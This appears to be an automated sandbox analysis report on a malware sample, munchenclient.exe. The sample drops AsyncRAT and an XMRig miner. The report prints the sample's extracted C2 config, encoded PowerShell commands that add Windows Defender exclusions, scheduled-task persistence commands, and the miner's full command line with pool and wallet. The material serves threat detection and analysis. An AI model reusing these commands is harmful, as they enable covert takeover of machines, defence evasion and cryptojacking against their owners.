Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
18-10-2024 14:53
General
-
Target
munchenclient.exe
-
Size
6.3MB
-
MD5
b995bac46098f434d11d84ec79bcb6ac
-
SHA1
3bb75ae3a8ec4054ccbeea3e3b2daf854bad81e2
-
SHA256
0a7f831cb637214cae61b0e833bd5e5fabadd5dc5d4d68331fe76cce091e1542
-
SHA512
72a515bfb170f0c06a26b3907cf31802a1ebb3b148d0f3a60d4424ea899f5f1b38d9a4bfd5fe25960d65eda8623e9ac12f1069d2940b1ad7e234c8bf78da54ce
-
SSDEEP
196608:kpPx7IW+Ryxgp1qRAL1vJYrET+9b6P32gm/uMkOPx5WzN:k9x5gp1qSL1vJYrM8b+3NkOOPxy
Malware Config
Extracted
asyncrat
1.0.7
Gibsons
198.98.58.93:999
obamanet_floyd999
-
delay
1
-
install
true
-
install_file
Core Sound Service.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Async RAT payload 1 IoCs
-
XMRig Miner payload 17 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Start PowerShell.
-
Executes dropped EXE 10 IoCs
-
Loads dropped DLL 12 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
-
Suspicious use of AdjustPrivilegeToken 13 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\munchenclient.exe"C:\Users\Admin\AppData\Local\Temp\munchenclient.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAZAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAcwBoACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABjAG8AZABlACAAZQB4AGUAYwB1AHQAaQBvAG4AIABjAGEAbgBuAG8AdAAgAHAAcgBvAGMAZQBlAGQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIAB3AGEAcwAgAG4AbwB0ACAAZgBvAHUAbgBkAC4AIABSAGUAaQBuAHMAdABhAGwAbABpAG4AZwAgAHQAaABlACAAYQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbQBhAHkAIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG4AaQBxACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcwByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAaABrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdgBpACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\munchenclients.exe"C:\Users\Admin\AppData\Local\Temp\munchenclients.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAeABoACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAbQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AGSB0ACAAcwB0AGEAcgB0ACAAYgBlAGMAYQB1AHMAZQAgAE0AUwBWAEMAUAAxADQAMAAuAGQAbABsACAAaQBzACAAbQBpAHMAcwBpAG4AZwAgAGYAcgBvAG0AIAB5AG8AdQByACAAYwBvAG0AcAB1AHQAZQByAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHEAcABlACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AagBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAcAB1ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Core Sound Service" /tr '"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Core Sound Service" /tr '"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDC5B.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"'6⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"10⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services64.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\services64.exeC:\Users\Admin\services64.exe10⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"11⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {EF1A5678-7F04-470E-BC33-0A221E4C8FB5} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"C:\Users\Admin\AppData\Roaming\Core Sound Service.exe"2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
3Disable or Modify Tools
3Modify Registry
4Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
411KB
MD54cf5485962a77f230dc8f55b491130cd
SHA1148418d84ec198032a3c384a03571dc45ee26a3d
SHA256d976098cc4601c051f863f3eb9c0cb339471da6f67f6eae015b3f0239a44869b
SHA512296abebc586c3bed08e8d195730e80426471f3a68833d054cbd31a09a61ba0a407844e70a5c713d67ffcc95bde7f7c0d5efc5307cee9fa88607e3117fe0b6ac5
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
1.4MB
MD5178a0f45fde7db40c238f1340a0c0ec0
SHA1dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe
SHA2569fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed
SHA5124b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee
-
Filesize
5.9MB
MD5ea11d7c22e4b34f7acccaa5154263a6c
SHA11bdfc6ec9aa260783546ed35fcc996cedda7b193
SHA256e1776f0997d5d91ca25490e8948e449fefbf4d56ef442b64cc1bf94fb680c661
SHA51247b95e0f54fc4975788e55a784066577cd70512cd0508e8d13c256cac72f768c0d3b505411275d885108047fd1459da09ac76d567d8eeb455b3768ae1a778272
-
Filesize
2.2MB
MD5bfc16c7476c61d4b5a004ba97f5eccc3
SHA17a136debf77f394b0412d979c73e4f8af8587396
SHA2561b343c5e48c01f376cc3887fa7000b0e69eb1894735c89b9c8d0ee1597893530
SHA5123766067704a96a8bef769d907d39368ed3a25bba60af32b0087ae0a411c48735741af9a804926cae93eb86f520cfbbbbbd0ebb09242977d0f07179d1a6dba17e
-
Filesize
162B
MD5104ff2c7bc2cebdeea78233b1cd614cc
SHA158956fb1798434d422b34b03643890580e4cc113
SHA25655400c52980c38d5f2c54551b87a2e166a233cde626f563407d36973deaecdb5
SHA51276f3bdd4e57b3a974f8975ffdb50690b531111e2baeb777b6269b553aa744e74db0ff4f5ae2a7df9f5601c7a22bbd28bdf7eca6e8fa6704314074c12efcaee3b
-
Filesize
7KB
MD5ec3a478c5ec412dd89b44c219413b711
SHA1592d003d0aeb4f6962caa4ef29e886b7602ac26c
SHA25661dc9095f74a3b53ecf95cd86db486b287b85bba2bb146acb41f58130a4d6bd4
SHA51234238f525a75325e4cf600f2e34bae54bf2bada6d8f942f2a42792257f02fd2bf62a1486b266d3d260e518cfa386816f06e85b1eeddcbf93687cf7959067e0f4
-
Filesize
7KB
MD5fa2fd0aee87274daf7f056004789f9ea
SHA14b28eb8af509fe450e3b946fee301d2595872939
SHA256e846afd995e4e3ae5ee40f354da429678513c8a61b0465893b5764262eac1018
SHA5125438da0565ce7d24e0da163e1f6233ced2e7a4c0b27a3f7e8e2856a63b55fdcfede0710ea68cdc77d1d4c625201234077285db9975a2c0d4fdc9f58001975ae5
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
5.9MB
MD56ef38dfd53a643a2225848759960dbac
SHA129cfc9715c4e978a82734459cef0ff9a1ce4ddc4
SHA256945a4092e68d2d3a5b18b8edfd6fe23e3ee96747c05fe5a8bd98a5a3b3a34a5f
SHA5121a31a137cf4071c30488e64abc50291c8a6435d68d5f873d7f53d08621bc346ca09065647fc3c0fa70fc269544461bab78060e9e61ff98435d70b87c28b8a4b1
-
Filesize
31KB
MD5cfe1ab1913bbd166bca480eb4e5d1364
SHA1a1e87dd6018f244966d875054330640f6e2d9c00
SHA256db41aa5958994bce76ea6b86083cbf634760a5b1ccdeec9c2387ec6bc33915f6
SHA512978a65def8eadc595d34752d54f76d8638bf133d09295e763f7b42a2bd342ed334fc0b1ae3680f0bff17f1899ecb42cf50e827dd4c91d4b16bdaadcdf41e3ae4
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
24KB
-
Filesize
24KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
4KB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
128KB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
432KB
-
Filesize
56KB
-
Filesize
400KB
-
Filesize
48KB
-
Filesize
432KB
-
Filesize
4.4MB
-
Filesize
4.4MB